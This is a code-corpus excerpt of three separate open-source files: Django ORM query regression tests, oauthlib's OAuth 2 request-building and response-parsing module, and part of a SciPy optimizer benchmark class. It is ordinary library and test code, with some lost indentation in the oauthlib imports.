        # with id == status.
        self.assertQuerysetEqual(
            Order.objects.filter(items__in=OrderItem.objects.values_list('status')),
            [o1.pk], lambda x: x.pk)
class DoubleInSubqueryTests(TestCase):
    """An __in subquery whose source is itself an __in subquery works."""

    def test_double_subquery_in(self):
        leaf_a_foo = LeafA.objects.create(data='foo')
        leaf_a_bar = LeafA.objects.create(data='bar')
        leaf_b_one = LeafB.objects.create(data='lfb1')
        leaf_b_two = LeafB.objects.create(data='lfb2')
        Join.objects.create(a=leaf_a_foo, b=leaf_b_one)
        Join.objects.create(a=leaf_a_bar, b=leaf_b_two)

        # Inner subquery: pks of LeafA rows with data='foo'.
        inner = LeafA.objects.filter(data='foo').values_list('pk', flat=True)
        # Middle subquery: b ids of joins whose a is in the inner subquery.
        middle = Join.objects.filter(a__in=inner).values_list('b__id', flat=True)
        outer = LeafB.objects.filter(pk__in=middle)

        self.assertQuerysetEqual(
            outer, [leaf_b_one], lambda x: x)
class Ticket18785Tests(TestCase):
    def test_ticket_18785(self):
        # Test join trimming from ticket18785
        qs = Item.objects.exclude(
            note__isnull=False
        ).filter(
            name='something', creator__extra__isnull=True
        ).order_by()
        # Only the creator join survives as INNER; no OUTER joins remain.
        self.assertEqual(1, str(qs.query).count('INNER JOIN'))
        self.assertEqual(0, str(qs.query).count('OUTER JOIN'))
class Ticket20788Tests(TestCase):
    def test_ticket_20788(self):
        # exclude() through a nullable chain must not drop rows whose
        # chain is entirely unrelated to the excluded page (#20788).
        Paragraph.objects.create()
        paragraph = Paragraph.objects.create()
        page = paragraph.page.create()
        chapter = Chapter.objects.create(paragraph=paragraph)
        Book.objects.create(chapter=chapter)
        paragraph2 = Paragraph.objects.create()
        Page.objects.create()
        chapter2 = Chapter.objects.create(paragraph=paragraph2)
        book2 = Book.objects.create(chapter=chapter2)
        sentences_not_in_pub = Book.objects.exclude(
            chapter__paragraph__page=page)
        self.assertQuerysetEqual(
            sentences_not_in_pub, [book2], lambda x: x)
class Ticket12807Tests(TestCase):
    def test_ticket_12807(self):
        p1 = Paragraph.objects.create()
        p2 = Paragraph.objects.create()
        # The ORed condition below should have no effect on the query - the
        # ~Q(pk__in=[]) will always be True.
        qs = Paragraph.objects.filter((Q(pk=p2.pk) | ~Q(pk__in=[])) & Q(pk=p1.pk))
        self.assertQuerysetEqual(qs, [p1], lambda x: x)
class RelatedLookupTypeTests(TestCase):
    """
    Passing a wrongly-typed object to a related lookup raises ValueError,
    while proxy, child and parent instances are accepted (#23226, #23396).
    """
    # Expected message template for the wrong-type ValueError.
    error = 'Cannot query "%s": Must be "%s" instance.'

    @classmethod
    def setUpTestData(cls):
        cls.oa = ObjectA.objects.create(name="oa")
        cls.poa = ProxyObjectA.objects.get(name="oa")
        cls.coa = ChildObjectA.objects.create(name="coa")
        # An Order sharing oa's pk but of an unrelated model.
        cls.wrong_type = Order.objects.create(id=cls.oa.pk)
        cls.ob = ObjectB.objects.create(name="ob", objecta=cls.oa, num=1)
        ProxyObjectB.objects.create(name="pob", objecta=cls.oa, num=2)
        cls.pob = ProxyObjectB.objects.all()
        ObjectC.objects.create(childobjecta=cls.coa)

    def test_wrong_type_lookup(self):
        """
        A ValueError is raised when the incorrect object type is passed to a
        query lookup.
        """
        # Passing incorrect object type
        with self.assertRaisesMessage(ValueError,
                self.error % (self.wrong_type, ObjectA._meta.object_name)):
            ObjectB.objects.get(objecta=self.wrong_type)

        with self.assertRaisesMessage(ValueError,
                self.error % (self.wrong_type, ObjectA._meta.object_name)):
            ObjectB.objects.filter(objecta__in=[self.wrong_type])

        with self.assertRaisesMessage(ValueError,
                self.error % (self.wrong_type, ObjectA._meta.object_name)):
            ObjectB.objects.filter(objecta=self.wrong_type)

        with self.assertRaisesMessage(ValueError,
                self.error % (self.wrong_type, ObjectB._meta.object_name)):
            ObjectA.objects.filter(objectb__in=[self.wrong_type, self.ob])

        # Passing an object of the class on which query is done.
        with self.assertRaisesMessage(ValueError,
                self.error % (self.ob, ObjectA._meta.object_name)):
            ObjectB.objects.filter(objecta__in=[self.poa, self.ob])

        with self.assertRaisesMessage(ValueError,
                self.error % (self.ob, ChildObjectA._meta.object_name)):
            ObjectC.objects.exclude(childobjecta__in=[self.coa, self.ob])

    def test_wrong_backward_lookup(self):
        """
        A ValueError is raised when the incorrect object type is passed to a
        query lookup for backward relations.
        """
        with self.assertRaisesMessage(ValueError,
                self.error % (self.oa, ObjectB._meta.object_name)):
            ObjectA.objects.filter(objectb__in=[self.oa, self.ob])

        with self.assertRaisesMessage(ValueError,
                self.error % (self.oa, ObjectB._meta.object_name)):
            ObjectA.objects.exclude(objectb=self.oa)

        with self.assertRaisesMessage(ValueError,
                self.error % (self.wrong_type, ObjectB._meta.object_name)):
            ObjectA.objects.get(objectb=self.wrong_type)

    def test_correct_lookup(self):
        """
        When passing proxy model objects, child objects, or parent objects,
        lookups work fine.
        """
        out_a = ['<ObjectA: oa>', ]
        out_b = ['<ObjectB: ob>', '<ObjectB: pob>']
        out_c = ['<ObjectC: >']

        # proxy model objects
        self.assertQuerysetEqual(ObjectB.objects.filter(objecta=self.poa).order_by('name'), out_b)
        self.assertQuerysetEqual(ObjectA.objects.filter(objectb__in=self.pob).order_by('pk'), out_a * 2)

        # child objects
        self.assertQuerysetEqual(ObjectB.objects.filter(objecta__in=[self.coa]), [])
        self.assertQuerysetEqual(ObjectB.objects.filter(objecta__in=[self.poa, self.coa]).order_by('name'), out_b)
        self.assertQuerysetEqual(ObjectB.objects.filter(objecta__in=iter([self.poa, self.coa])).order_by('name'), out_b)

        # parent objects
        self.assertQuerysetEqual(ObjectC.objects.exclude(childobjecta=self.oa), out_c)

        # Test for #23226
        with self.assertNumQueries(0):
            ObjectB.objects.filter(objecta__in=ObjectA.objects.all())

    def test_values_queryset_lookup(self):
        """
        #23396 - Ensure ValueQuerySets are not checked for compatibility with the lookup field
        """
        self.assertQuerysetEqual(ObjectB.objects.filter(
            objecta__in=ObjectB.objects.all().values_list('pk')
        ).order_by('pk'), ['<ObjectB: ob>', '<ObjectB: pob>'])
class Ticket14056Tests(TestCase):
    def test_ticket_14056(self):
        # Ordering on a nullable reverse relation: NULLs sort either
        # first or last depending on the backend (#14056).
        s1 = SharedConnection.objects.create(data='s1')
        s2 = SharedConnection.objects.create(data='s2')
        s3 = SharedConnection.objects.create(data='s3')
        PointerA.objects.create(connection=s2)
        expected_ordering = (
            [s1, s3, s2] if connection.features.nulls_order_largest
            else [s2, s1, s3]
        )
        self.assertQuerysetEqual(
            SharedConnection.objects.order_by('-pointera__connection', 'pk'),
            expected_ordering, lambda x: x
        )
class Ticket20955Tests(TestCase):
    def test_ticket_20955(self):
        # select_related() through chained one-to-ones must produce the
        # same objects as plain attribute access, with zero extra queries.
        jack = Staff.objects.create(name='jackstaff')
        jackstaff = StaffUser.objects.create(staff=jack)
        jill = Staff.objects.create(name='jillstaff')
        jillstaff = StaffUser.objects.create(staff=jill)
        task = Task.objects.create(creator=jackstaff, owner=jillstaff, title="task")
        task_get = Task.objects.get(pk=task.pk)
        # Load data so that assertNumQueries doesn't complain about the get
        # version's queries.
        task_get.creator.staffuser.staff
        task_get.owner.staffuser.staff
        qs = Task.objects.select_related(
            'creator__staffuser__staff', 'owner__staffuser__staff')
        self.assertEqual(str(qs.query).count(' JOIN '), 6)
        task_select_related = qs.get(pk=task.pk)
        with self.assertNumQueries(0):
            self.assertEqual(task_select_related.creator.staffuser.staff,
                             task_get.creator.staffuser.staff)
            self.assertEqual(task_select_related.owner.staffuser.staff,
                             task_get.owner.staffuser.staff)
class Ticket21203Tests(TestCase):
    def test_ticket_21203(self):
        # defer() on a select_related parent must not break loading the
        # remaining parent fields (#21203).
        p = Ticket21203Parent.objects.create(parent_bool=True)
        c = Ticket21203Child.objects.create(parent=p)
        qs = Ticket21203Child.objects.select_related('parent').defer('parent__created')
        self.assertQuerysetEqual(qs, [c], lambda x: x)
        self.assertIs(qs[0].parent.parent_bool, True)
class ValuesJoinPromotionTests(TestCase):
    """values() must not promote joins that filters already made INNER."""

    def test_values_no_promotion_for_existing(self):
        qs = Node.objects.filter(parent__parent__isnull=False)
        self.assertIn(' INNER JOIN ', str(qs.query))
        qs = qs.values('parent__parent__id')
        self.assertIn(' INNER JOIN ', str(qs.query))
        # Make sure there is a left outer join without the filter.
        qs = Node.objects.values('parent__parent__id')
        self.assertIn(' LEFT OUTER JOIN ', str(qs.query))

    def test_non_nullable_fk_not_promoted(self):
        # A non-nullable FK cannot produce NULLs, so INNER is safe.
        qs = ObjectB.objects.values('objecta__name')
        self.assertIn(' INNER JOIN ', str(qs.query))

    def test_ticket_21376(self):
        a = ObjectA.objects.create()
        ObjectC.objects.create(objecta=a)
        qs = ObjectC.objects.filter(
            Q(objecta=a) | Q(objectb__objecta=a),
        )
        qs = qs.filter(
            Q(objectb=1) | Q(objecta=a),
        )
        self.assertEqual(qs.count(), 1)
        # The multi-valued objectb join inside the OR must stay LOUTER.
        tblname = connection.ops.quote_name(ObjectB._meta.db_table)
        self.assertIn(' LEFT OUTER JOIN %s' % tblname, str(qs.query))
class ForeignKeyToBaseExcludeTests(TestCase):
    def test_ticket_21787(self):
        # exclude()/filter() through an FK that points to a multi-table
        # inheritance parent (#21787).
        sc1 = SpecialCategory.objects.create(special_name='sc1', name='sc1')
        sc2 = SpecialCategory.objects.create(special_name='sc2', name='sc2')
        sc3 = SpecialCategory.objects.create(special_name='sc3', name='sc3')
        c1 = CategoryItem.objects.create(category=sc1)
        CategoryItem.objects.create(category=sc2)
        self.assertQuerysetEqual(
            SpecialCategory.objects.exclude(
                categoryitem__id=c1.pk).order_by('name'),
            [sc2, sc3], lambda x: x
        )
        self.assertQuerysetEqual(
            SpecialCategory.objects.filter(categoryitem__id=c1.pk),
            [sc1], lambda x: x
        )
class ReverseM2MCustomPkTests(TestCase):
    def test_ticket_21879(self):
        # M2M lookups in both directions when both models use custom
        # (non-integer) primary keys (#21879).
        cpt1 = CustomPkTag.objects.create(id='cpt1', tag='cpt1')
        cp1 = CustomPk.objects.create(name='cp1', extra='extra')
        cp1.custompktag_set.add(cpt1)
        self.assertQuerysetEqual(
            CustomPk.objects.filter(custompktag=cpt1), [cp1],
            lambda x: x)
        self.assertQuerysetEqual(
            CustomPkTag.objects.filter(custom_pk=cp1), [cpt1],
            lambda x: x)
class Ticket22429Tests(TestCase):
    def test_ticket_22429(self):
        # Negated F() comparison across a multi-valued relation: st2 has
        # no classroom at all, so ~Q(classroom__school=F('school'))
        # matches it (#22429).
        sc1 = School.objects.create()
        st1 = Student.objects.create(school=sc1)
        sc2 = School.objects.create()
        st2 = Student.objects.create(school=sc2)
        cr = Classroom.objects.create(school=sc1)
        cr.students.add(st1)
        queryset = Student.objects.filter(~Q(classroom__school=F('school')))
        self.assertQuerysetEqual(queryset, [st2], lambda x: x)
class Ticket23605Tests(TestCase):
    def test_ticket_23605(self):
        # Test filtering on a complicated q-object from ticket's report.
        # The query structure is such that we have multiple nested subqueries.
        # The original problem was that the inner queries weren't relabeled
        # correctly.
        a1 = Ticket23605A.objects.create()
        a2 = Ticket23605A.objects.create()
        c1 = Ticket23605C.objects.create(field_c0=10000.0)
        Ticket23605B.objects.create(
            field_b0=10000.0, field_b1=True,
            modelc_fk=c1, modela_fk=a1)
        complex_q = Q(pk__in=Ticket23605A.objects.filter(
            Q(
                # True for a1 as field_b0 = 10000, field_c0=10000
                # False for a2 as no ticket23605b found
                ticket23605b__field_b0__gte=1000000 /
                F("ticket23605b__modelc_fk__field_c0")
            ) &
            # True for a1 (field_b1=True)
            Q(ticket23605b__field_b1=True) &
            ~Q(ticket23605b__pk__in=Ticket23605B.objects.filter(
                ~(
                    # Same filters as above commented filters, but
                    # double-negated (one for Q() above, one for
                    # parentheses). So, again a1 match, a2 not.
                    Q(field_b1=True) &
                    Q(field_b0__gte=1000000 / F("modelc_fk__field_c0"))
                )
            ))).filter(ticket23605b__field_b1=True))
        # filter() and exclude() with the same Q must partition the rows.
        qs1 = Ticket23605A.objects.filter(complex_q)
        self.assertQuerysetEqual(qs1, [a1], lambda x: x)
        qs2 = Ticket23605A.objects.exclude(complex_q)
        self.assertQuerysetEqual(qs2, [a2], lambda x: x)
class TestTicket24279(TestCase):
    def test_ticket_24278(self):
        # An empty pk__in ORed with an empty Q() must yield no results,
        # not all results (#24278).
        School.objects.create()
        qs = School.objects.filter(Q(pk__in=()) | Q())
        self.assertQuerysetEqual(qs, [])
class TestInvalidValuesRelation(TestCase):
    def test_invalid_values(self):
        # Non-integer values for an integer-pk relation lookup raise
        # ValueError instead of failing at the database level.
        with self.assertRaises(ValueError):
            Annotation.objects.filter(tag='abc')
        with self.assertRaises(ValueError):
            Annotation.objects.filter(tag__in=[123, 'abc'])
class TestTicket24605(TestCase):
    def test_ticket_24605(self):
        """
        Subquery table names should be quoted.
        """
        i1 = Individual.objects.create(alive=True)
        RelatedIndividual.objects.create(related=i1)
        i2 = Individual.objects.create(alive=False)
        RelatedIndividual.objects.create(related=i2)
        i3 = Individual.objects.create(alive=True)
        i4 = Individual.objects.create(alive=False)
        # Only i4 is dead AND has no related individual.
        self.assertQuerysetEqual(
            Individual.objects.filter(Q(alive=False), Q(related_individual__isnull=True)),
            [i4], lambda x: x
        )
        self.assertQuerysetEqual(
            Individual.objects.exclude(
                Q(alive=False), Q(related_individual__isnull=True)
            ).order_by('pk'),
            [i1, i2, i3], lambda x: x
        )
| bsd-3-clause |
rjhunter8285/nsc-cloudproject-s22016 | api/FlaskApp/FlaskApp/python_modules/oauthlib/oauth2/rfc6749/parameters.py | 86 | 15901 | # -*- coding: utf-8 -*-
"""
oauthlib.oauth2.rfc6749.parameters
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This module contains methods related to `Section 4`_ of the OAuth 2 RFC.
.. _`Section 4`: http://tools.ietf.org/html/rfc6749#section-4
"""
from __future__ import absolute_import, unicode_literals
import json
import os
import time
try:
import urlparse
except ImportError:
import urllib.parse as urlparse
from oauthlib.common import add_params_to_uri, add_params_to_qs, unicode_type
from oauthlib.signals import scope_changed
from .errors import raise_from_error, MissingTokenError, MissingTokenTypeError
from .errors import MismatchingStateError, MissingCodeError
from .errors import InsecureTransportError
from .tokens import OAuth2Token
from .utils import list_to_scope, scope_to_list, is_secure_transport
def prepare_grant_uri(uri, client_id, response_type, redirect_uri=None,
                      scope=None, state=None, **kwargs):
    """Prepare the authorization grant request URI.

    The client constructs the request URI by adding the following
    parameters to the query component of the authorization endpoint URI
    using the ``application/x-www-form-urlencoded`` format as defined by
    [`W3C.REC-html401-19991224`_].

    :param uri: The authorization endpoint URI; must use a secure transport.
    :param client_id: The client identifier as described in `Section 2.2`_.
    :param response_type: To indicate which OAuth 2 grant/flow is required,
                          "code" and "token".
    :param redirect_uri: The client provided URI to redirect back to after
                         authorization as described in `Section 3.1.2`_.
    :param scope: The scope of the access request as described by
                  `Section 3.3`_.
    :param state: An opaque value used by the client to maintain
                  state between the request and callback, SHOULD be used
                  for preventing cross-site request forgery as described
                  in `Section 10.12`_.
    :param kwargs: Extra arguments to embed in the grant/authorization URL.
    :raises InsecureTransportError: If ``uri`` is not secure.

    An example of an authorization code grant authorization URL:

    .. code-block:: http

        GET /authorize?response_type=code&client_id=s6BhdRkqt3&state=xyz
        &redirect_uri=https%3A%2F%2Fclient%2Eexample%2Ecom%2Fcb HTTP/1.1
        Host: server.example.com

    .. _`W3C.REC-html401-19991224`: http://tools.ietf.org/html/rfc6749#ref-W3C.REC-html401-19991224
    .. _`Section 2.2`: http://tools.ietf.org/html/rfc6749#section-2.2
    .. _`Section 3.1.2`: http://tools.ietf.org/html/rfc6749#section-3.1.2
    .. _`Section 3.3`: http://tools.ietf.org/html/rfc6749#section-3.3
    .. _`section 10.12`: http://tools.ietf.org/html/rfc6749#section-10.12
    """
    if not is_secure_transport(uri):
        raise InsecureTransportError()

    params = [('response_type', response_type), ('client_id', client_id)]

    if redirect_uri:
        params.append(('redirect_uri', redirect_uri))
    if scope:
        params.append(('scope', list_to_scope(scope)))
    if state:
        params.append(('state', state))

    # Only forward extra parameters with truthy values; coerce keys to
    # text so encoding is consistent on Python 2 and 3.
    for key, value in kwargs.items():
        if value:
            params.append((unicode_type(key), value))

    return add_params_to_uri(uri, params)
def prepare_token_request(grant_type, body='', **kwargs):
    """Prepare the access token request.

    The client makes a request to the token endpoint by adding the
    following parameters using the ``application/x-www-form-urlencoded``
    format in the HTTP request entity-body:

    :param grant_type: To indicate grant type being used, i.e. "password",
                       "authorization_code" or "client_credentials".
    :param body: Existing request body to embed parameters in.
    :param code: If using authorization code grant, pass the previously
                 obtained authorization code as the ``code`` argument.
    :param redirect_uri: If the "redirect_uri" parameter was included in the
                         authorization request as described in
                         `Section 4.1.1`_, and their values MUST be identical.
    :param kwargs: Extra arguments to embed in the request body.
    :returns: The request body with the parameters urlencoded into it.

    An example of an authorization code token request body:

    .. code-block:: http

        grant_type=authorization_code&code=SplxlOBeZQQYbYS6WxSbIA
        &redirect_uri=https%3A%2F%2Fclient%2Eexample%2Ecom%2Fcb

    .. _`Section 4.1.1`: http://tools.ietf.org/html/rfc6749#section-4.1.1
    """
    params = [('grant_type', grant_type)]

    # Scope may be given as a list; normalize it to the space-separated
    # string form the spec requires before serializing.
    if 'scope' in kwargs:
        kwargs['scope'] = list_to_scope(kwargs['scope'])

    # Only forward extra parameters with truthy values; coerce keys to
    # text so encoding is consistent on Python 2 and 3.
    for key, value in kwargs.items():
        if value:
            params.append((unicode_type(key), value))

    return add_params_to_qs(body, params)
def prepare_token_revocation_request(url, token, token_type_hint="access_token",
                                     callback=None, body='', **kwargs):
    """Prepare a token revocation request (RFC 7009).

    :param url: The revocation endpoint; must use a secure transport.
    :param token: REQUIRED. The token that the client wants to get revoked.
    :param token_type_hint: OPTIONAL. A hint about the type of the token
        submitted for revocation. Clients MAY pass this parameter in order
        to help the authorization server to optimize the token lookup. If
        the server is unable to locate the token using the given hint, it
        MUST extend its search across all of its supported token types. An
        authorization server MAY ignore this parameter, particularly if it
        is able to detect the token type automatically. This specification
        defines two such values:

        * access_token: An access token as defined in [RFC6749],
          `Section 1.4`_
        * refresh_token: A refresh token as defined in [RFC6749],
          `Section 1.5`_

        Specific implementations, profiles, and extensions of this
        specification MAY define other values for this parameter using the
        registry defined in `Section 4.1.2`_.
    :param callback: OPTIONAL. If given, a JSONP-style request is prepared
        with the parameters in the URL instead of the body.
    :param body: Existing request body to embed parameters in.
    :param kwargs: Extra arguments to embed in the request.
    :returns: A ``(url, headers, body)`` tuple.
    :raises InsecureTransportError: If ``url`` is not secure.

    .. _`Section 1.4`: http://tools.ietf.org/html/rfc6749#section-1.4
    .. _`Section 1.5`: http://tools.ietf.org/html/rfc6749#section-1.5
    .. _`Section 4.1.2`: http://tools.ietf.org/html/rfc7009#section-4.1.2
    """
    if not is_secure_transport(url):
        raise InsecureTransportError()

    params = [('token', token)]

    if token_type_hint:
        params.append(('token_type_hint', token_type_hint))

    # Only forward extra parameters with truthy values; coerce keys to
    # text so encoding is consistent on Python 2 and 3.
    for key, value in kwargs.items():
        if value:
            params.append((unicode_type(key), value))

    headers = {'Content-Type': 'application/x-www-form-urlencoded'}

    if callback:
        # JSONP-style revocation: parameters travel in the URL.
        params.append(('callback', callback))
        return add_params_to_uri(url, params), headers, body
    else:
        return url, headers, add_params_to_qs(body, params)
def parse_authorization_code_response(uri, state=None):
    """Parse authorization grant response URI into a dict.

    If the resource owner grants the access request, the authorization
    server issues an authorization code and delivers it to the client by
    adding the following parameters to the query component of the
    redirection URI using the ``application/x-www-form-urlencoded`` format:

    **code**
        REQUIRED. The authorization code generated by the
        authorization server. The authorization code MUST expire
        shortly after it is issued to mitigate the risk of leaks. The
        client MUST NOT use the authorization code more than once.

    **state**
        REQUIRED if the "state" parameter was present in the client
        authorization request. The exact value received from the
        client.

    :param uri: The full redirect URL back to the client.
    :param state: The state parameter from the authorization request.
    :returns: A dict of the query parameters.
    :raises InsecureTransportError: If ``uri`` is not secure.
    :raises MissingCodeError: If no ``code`` parameter is present.
    :raises MismatchingStateError: If the returned state does not match.

    For example, the authorization server redirects the user-agent by
    sending the following HTTP response:

    .. code-block:: http

        HTTP/1.1 302 Found
        Location: https://client.example.com/cb?code=SplxlOBeZQQYbYS6WxSbIA
                &state=xyz
    """
    if not is_secure_transport(uri):
        raise InsecureTransportError()

    query = urlparse.urlparse(uri).query
    params = dict(urlparse.parse_qsl(query))

    # PEP 8 membership idiom ("x not in y" rather than "not x in y").
    if 'code' not in params:
        raise MissingCodeError("Missing code parameter in response.")

    if state and params.get('state') != state:
        raise MismatchingStateError()

    return params
def parse_implicit_response(uri, state=None, scope=None):
    """Parse the implicit grant token response URI into an OAuth2Token.

    In the implicit grant the authorization server delivers the token in
    the *fragment* component of the redirection URI, urlencoded, with at
    least ``access_token`` and ``token_type``, and optionally
    ``expires_in``, ``scope`` and ``state`` (see RFC 6749, Section 4.2.2).

    :param uri: The full redirect URL carrying the token in its fragment.
    :param state: The state value sent in the authorization request, if any.
    :param scope: The scope originally requested, for change detection.
    :returns: A validated :class:`OAuth2Token`.
    :raises InsecureTransportError: If ``uri`` is not secure.
    :raises ValueError: If the returned state does not match ``state``.

    Example redirect:

    .. code-block:: http

        HTTP/1.1 302 Found
        Location: http://example.com/cb#access_token=2YotnFZFEjr1zCsicMWpAA
                &state=xyz&token_type=example&expires_in=3600
    """
    if not is_secure_transport(uri):
        raise InsecureTransportError()

    token = dict(urlparse.parse_qsl(
        urlparse.urlparse(uri).fragment, keep_blank_values=True))

    if 'scope' in token:
        token['scope'] = scope_to_list(token['scope'])

    if 'expires_in' in token:
        token['expires_at'] = time.time() + int(token['expires_in'])

    if state and token.get('state', None) != state:
        raise ValueError("Mismatching or missing state in params.")

    token = OAuth2Token(token, old_scope=scope)
    validate_token_parameters(token)
    return token
def parse_token_response(body, scope=None):
    """Parse a token endpoint response body into an OAuth2Token.

    Per RFC 6749 Section 5.1 the server returns a JSON object containing
    ``access_token`` and ``token_type`` (REQUIRED), plus the optional
    ``expires_in``, ``refresh_token`` and ``scope`` members. Some legacy
    providers instead return a urlencoded string, which is also accepted.

    :param body: The full response body, JSON or urlencoded.
    :param scope: The scope requested during authorization, for change
                  detection.
    :returns: A validated :class:`OAuth2Token`.

    Example response:

    .. code-block:: http

        HTTP/1.1 200 OK
        Content-Type: application/json
        Cache-Control: no-store
        Pragma: no-cache

        {
            "access_token":"2YotnFZFEjr1zCsicMWpAA",
            "token_type":"example",
            "expires_in":3600,
            "refresh_token":"tGzv3JOkF0XG5Qx2TlKWIA",
            "example_parameter":"example_value"
        }

    .. _`Section 5.1`: http://tools.ietf.org/html/rfc6749#section-5.1
    """
    try:
        token = json.loads(body)
    except ValueError:
        # Fall back to URL-encoded string, to support old implementations,
        # including (at time of writing) Facebook. See:
        # https://github.com/idan/oauthlib/issues/267
        token = dict(urlparse.parse_qsl(body))
        for lifetime_key in ('expires_in', 'expires'):
            # Urlencoded values are all strings; cast lifetimes to int.
            if lifetime_key in token:
                token[lifetime_key] = int(token[lifetime_key])

    if 'scope' in token:
        token['scope'] = scope_to_list(token['scope'])

    # Normalize the legacy 'expires' spelling before deriving expires_at.
    if 'expires' in token:
        token['expires_in'] = token.pop('expires')

    if 'expires_in' in token:
        token['expires_at'] = time.time() + int(token['expires_in'])

    token = OAuth2Token(token, old_scope=scope)
    validate_token_parameters(token)
    return token
def validate_token_parameters(params):
    """Ensure token presence, token type, expiration and scope in params.

    :param params: An :class:`OAuth2Token` built from the token response.
    :raises MissingTokenError: If no access token is present.
    :raises MissingTokenTypeError: If ``token_type`` is absent and
        ``OAUTHLIB_STRICT_TOKEN_TYPE`` is set in the environment.
    :raises Warning: If the granted scope differs from the requested one
        and ``OAUTHLIB_RELAX_TOKEN_SCOPE`` is not set.
    """
    if 'error' in params:
        raise_from_error(params.get('error'), params)

    # Idiomatic membership tests ('x' not in d) instead of `not 'x' in d`.
    if 'access_token' not in params:
        raise MissingTokenError(description="Missing access token parameter.")

    if 'token_type' not in params:
        # token_type is REQUIRED by RFC 6749 section 5.1, but many providers
        # omit it; only enforce when the caller opts into strict checking.
        if os.environ.get('OAUTHLIB_STRICT_TOKEN_TYPE'):
            raise MissingTokenTypeError()

    # If the issued access token scope is different from the one requested by
    # the client, the authorization server MUST include the "scope" response
    # parameter to inform the client of the actual scope granted.
    # http://tools.ietf.org/html/rfc6749#section-3.3
    if params.scope_changed:
        message = 'Scope has changed from "{old}" to "{new}".'.format(
            old=params.old_scope, new=params.scope,
        )
        scope_changed.send(message=message, old=params.old_scopes, new=params.scopes)
        if not os.environ.get('OAUTHLIB_RELAX_TOKEN_SCOPE', None):
            # Raised as a Warning instance so callers may opt to catch and
            # continue; the token and both scopes are attached for inspection.
            w = Warning(message)
            w.token = params
            w.old_scope = params.old_scopes
            w.new_scope = params.scopes
            raise w
| apache-2.0 |
aarchiba/scipy | benchmarks/benchmarks/optimize.py | 4 | 19341 | from __future__ import division, print_function, absolute_import
import os
import time
import inspect
import json
import traceback
from collections import defaultdict, OrderedDict
import numpy as np
try:
import scipy.optimize
from scipy.optimize.optimize import rosen, rosen_der, rosen_hess
from scipy.optimize import (leastsq, basinhopping, differential_evolution,
dual_annealing, OptimizeResult)
except ImportError:
pass
from . import test_functions as funcs
from . import go_benchmark_functions as gbf
from .common import Benchmark
from .lsq_problems import extract_lsq_problems
class _BenchOptimizers(Benchmark):
    """a framework for benchmarking the optimizer

    Parameters
    ----------
    function_name : string
    fun : callable
    der : callable
        function that returns the derivative (jacobian, gradient) of fun
    hess : callable
        function that returns the hessian of fun
    minimizer_kwargs : kwargs
        additional keywords passed to the minimizer.  e.g. tol, maxiter
    """
    def __init__(self, function_name, fun, der=None, hess=None,
                 **minimizer_kwargs):
        self.function_name = function_name
        self.fun = fun
        self.der = der
        self.hess = hess
        self.minimizer_kwargs = minimizer_kwargs
        if "tol" not in minimizer_kwargs:
            minimizer_kwargs["tol"] = 1e-4
        self.results = []

    @classmethod
    def from_funcobj(cls, function_name, function, **minimizer_kwargs):
        """Alternate constructor wrapping a go_benchmark_functions problem
        object (used by the global-optimizer benchmarks)."""
        self = cls.__new__(cls)
        self.function_name = function_name
        self.function = function
        self.fun = function.fun
        # Not every benchmark function provides derivatives; default to None
        # so the `is not None` checks in bench_run cannot raise
        # AttributeError (previously `der` was only set when present and
        # `hess` never was).
        self.der = getattr(function, 'der', None)
        self.hess = getattr(function, 'hess', None)
        self.bounds = function.bounds
        self.minimizer_kwargs = minimizer_kwargs
        self.results = []
        return self

    def reset(self):
        """Discard all recorded results."""
        self.results = []

    def energy_gradient(self, x):
        """Return (f(x), grad f(x)) for function objects providing `der`."""
        return self.fun(x), self.function.der(x)

    def add_result(self, result, t, name):
        """add a result to the list"""
        result.time = t
        result.name = name
        # Gradient-free/hessian-free methods do not report these counters.
        if not hasattr(result, "njev"):
            result.njev = 0
        if not hasattr(result, "nhev"):
            result.nhev = 0
        self.results.append(result)

    def print_results(self):
        """print the current list of results"""
        results = self.average_results()
        # average_results() returns a dict keyed by minimizer name; sort the
        # summary objects themselves.  Sorting the dict directly would
        # iterate over its string keys and crash on `.nfail`.
        results = sorted(results.values(),
                         key=lambda x: (x.nfail, x.mean_time))
        if not results:
            return
        print("")
        print("=========================================================")
        print("Optimizer benchmark: %s" % (self.function_name))
        print("dimensions: %d, extra kwargs: %s" % (results[0].ndim, str(self.minimizer_kwargs)))
        print("averaged over %d starting configurations" % (results[0].ntrials))
        print(" Optimizer nfail nfev njev nhev time")
        print("---------------------------------------------------------")
        for res in results:
            print("%11s | %4d | %4d | %4d | %4d | %.6g" %
                  (res.name, res.nfail, res.mean_nfev, res.mean_njev, res.mean_nhev, res.mean_time))

    def average_results(self):
        """group the results by minimizer and average over the runs"""
        grouped_results = defaultdict(list)
        for res in self.results:
            grouped_results[res.name].append(res)
        averaged_results = dict()
        for name, result_list in grouped_results.items():
            newres = scipy.optimize.OptimizeResult()
            newres.name = name
            newres.mean_nfev = np.mean([r.nfev for r in result_list])
            newres.mean_njev = np.mean([r.njev for r in result_list])
            newres.mean_nhev = np.mean([r.nhev for r in result_list])
            newres.mean_time = np.mean([r.time for r in result_list])
            newres.ntrials = len(result_list)
            newres.nfail = len([r for r in result_list if not r.success])
            newres.nsuccess = len([r for r in result_list if r.success])
            try:
                newres.ndim = len(result_list[0].x)
            except TypeError:
                # 1-d minimizers may return a bare scalar for x.
                newres.ndim = 1
            averaged_results[name] = newres
        return averaged_results

    # for basinhopping
    def accept_test(self, x_new=None, *args, **kwargs):
        """
        Does the new candidate vector lie in between the bounds?

        Returns
        -------
        accept_test : bool
            The candidate vector lies in between the bounds
        """
        if not hasattr(self.function, "xmin"):
            return True
        if np.any(x_new < self.function.xmin):
            return False
        if np.any(x_new > self.function.xmax):
            return False
        return True

    def run_basinhopping(self):
        """
        Do an optimization run for basinhopping
        """
        kwargs = self.minimizer_kwargs
        # The temperature/stepsize hints live on the benchmark-function
        # object (self.function, cf. accept_test reading self.function.xmin),
        # not on the bare objective callable — probe the object the values
        # are actually read from.
        if hasattr(self.function, "temperature"):
            kwargs["T"] = self.function.temperature
        if hasattr(self.function, "stepsize"):
            kwargs["stepsize"] = self.function.stepsize
        minimizer_kwargs = {"method": "L-BFGS-B"}
        x0 = self.function.initial_vector()

        # basinhopping - no gradient
        minimizer_kwargs['jac'] = False
        self.function.nfev = 0

        t0 = time.time()
        res = basinhopping(
            self.fun, x0, accept_test=self.accept_test,
            minimizer_kwargs=minimizer_kwargs,
            **kwargs)
        t1 = time.time()
        res.success = self.function.success(res.x)
        res.nfev = self.function.nfev
        self.add_result(res, t1 - t0, 'basinh.')

